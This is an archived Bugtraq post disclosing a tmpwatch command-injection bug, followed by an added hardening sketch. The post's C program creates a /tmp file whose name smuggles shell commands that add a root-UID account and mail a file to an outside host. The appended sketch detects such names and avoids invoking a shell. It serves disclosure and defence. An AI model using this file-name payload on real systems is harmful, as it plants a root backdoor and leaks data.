[17104] in bugtraq
Re: tmpwatch executes shell commands
daemon@ATHENA.MIT.EDU (Alexander Y. Yurchenko)
Mon Oct 9 14:13:30 2000
Message-Id: <Pine.BSO.4.21.0010092216390.32268-100000@disorder.rt.mipt.ru>
Date: Mon, 9 Oct 2000 22:28:02 +0400
Reply-To: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
From: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Here is a simple example of my playing with the tmpwatch bug.
1. Execute the following in /tmp:
#include <stdio.h>
#include <stdlib.h>
int main()
{
    FILE *f;
    /* The whole string, shell metacharacters included, is the file name. */
    char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com<blablabla";
    if((f = fopen(filename, "a")) == 0) {
        perror("Could not create file");
        exit(1);
    }
    fclose(f);
    return 0;
}
2. cp /usr/sbin/adduser /tmp
3. Just wait for mail ;-)
---<*>---
grange
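
Added example (not part of the original post and not tmpwatch source): a defender-side sketch of how a cleanup tool can flag such file names and pass them to a helper without a shell. It assumes the weak pattern is a command line built from the file name and run through a shell; the function names, the stand-in helper script and the sample name are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Characters a POSIX shell interprets when a name is pasted into a command line. */
static const char SHELL_META[] = ";|&<>$`\\\"'()*?[]{}~!# \t\n";

/* Audit check: 1 if the name would change meaning inside a shell command,
 * i.e. if "helper " + name were handed to system() or popen(). */
int has_shell_meta(const char *name)
{
    return name[strcspn(name, SHELL_META)] != '\0';
}

/* Hardened pattern: fork + execv with a fixed argv, so no shell ever parses
 * the untrusted name. Returns the child's exit status, or -1 on error. */
int run_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(argv[0], argv); _exit(127); }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Stand-in helper (assumption): a fixed script that exits with its argument
 * count. The untrusted name arrives as "$1" and is data, not script text. */
int args_seen_by_helper(const char *name)
{
    char *const argv[] = { "/bin/sh", "-c", "exit $#", "sh", (char *)name, NULL };
    return run_argv(argv);
}

int main(void)
{
    const char *name = "report;touch INJECTED<x";  /* constructed sample name */
    printf("meta=%d args=%d\n", has_shell_meta(name), args_seen_by_helper(name));
    return 0;
}
```

The helper sees exactly one argument whatever the name contains, and no `INJECTED` file appears, because the name is never evaluated as shell text.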